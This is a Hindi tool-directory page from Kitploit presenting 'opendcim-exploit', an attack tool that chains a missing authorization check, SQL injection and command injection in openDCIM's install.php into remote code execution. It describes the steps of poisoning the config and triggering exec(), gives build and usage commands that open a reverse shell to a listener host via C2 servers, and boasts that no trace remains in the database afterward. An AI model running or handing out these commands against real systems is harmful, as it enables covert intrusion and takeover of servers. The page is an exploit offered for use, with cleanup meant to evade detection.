Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
opendcim-exploit — openDCIM install.php SQLi से RCE श्रृंखला (CWE-862 + CWE-89 + CWE-78) | Kitploit
उपकरण/GitHubGitHub/chocapikk/opendcim-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi से RCE श्रृंखला (CWE-862 + CWE-89 + CWE-78)

रिपॉजिटरी देखें
525 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

openDCIM - कॉन्फ़िग पॉइज़निंग के माध्यम से SQLi से RCE

openDCIM के install.php LDAP कॉन्फ़िगरेशन फ़ॉर्म को लक्षित करने वाली रिमोट कोड निष्पादन श्रृंखला। VulnCheck go-exploit फ़्रेमवर्क पर आधारित।

भेद्यता श्रृंखला

#CVECWEविवरण
1CVE-2026-28515CWE-862install.php LDAP कॉन्फ़िग फ़ॉर्म से पहले कोई भूमिका जाँच नहीं करता - कोई भी उपयोगकर्ता उस तक पहुँच सकता है
2CVE-2026-28516CWE-89Config::UpdateParameter() स्ट्रिंग इंटरपोलेशन का उपयोग करता है, PDO+MySQL के माध्यम से स्टैक्ड क्वेरी
3CVE-2026-28517CWE-78report_network_map.php dot कॉन्फ़िग मान को सीधे exec() में पास करता है

प्रभावित: सभी संस्करण (नवीनतम कमिट 4467e9c4 पर परीक्षण किया गया)

यह कैसे काम करता है

  1. install.php पर POST करें - LDAP फ़ॉर्म के माध्यम से SQL इंजेक्शन कॉन्फ़िग का बैकअप लेता है, dot को कमांड पेलोड से ओवरराइट करता है
  2. report_network_map.php पर GET करें - exec() ट्रिगर करता है, id आउटपुट के माध्यम से RCE की पुष्टि करता है
  3. install.php पर POST करें - dot को रिवर्स शेल पेलोड से ओवरराइट करता है
  4. report_network_map.php पर GET करें - रिवर्स शेल ट्रिगर करता है
  5. install.php पर POST करें - बैकअप टेबल से सभी मूल कॉन्फ़िग मान पुनर्स्थापित करता है

शोषण के बाद डेटाबेस में कोई निशान नहीं बचता।

बिल्ड

root@kitploit:~
go build -o opendcim-exploit .

उपयोग

Docker डिप्लॉयमेंट (बिना प्रमाणीकरण)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd डिप्लॉयमेंट (कोई भी मान्य उपयोगकर्ता)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

फ़्लैग्स

टूल डाउनलोड करें
फ़्लैगडिफ़ॉल्टविवरण
-rhostलक्ष्य होस्ट
-rport80लक्ष्य पोर्ट
-sslfalseHTTPS का उपयोग करें
-lhostलिसनर होस्ट (रिवर्स शेल के लिए)
-lportलिसनर पोर्ट (रिवर्स शेल के लिए)
-c2C2 प्रकार: SimpleShellServer या SSLShellServer
-usernameHTTP बेसिक ऑथ उपयोगकर्ता नाम (SetEnv डिप्लॉयमेंट के लिए छोड़ दें)
-passwordHTTP बेसिक ऑथ पासवर्ड (SetEnv डिप्लॉयमेंट के लिए छोड़ दें)
-aएसेट डिटेक्शन (जाँचें कि लक्ष्य शोषण योग्य है या नहीं)
-eशोषण मोड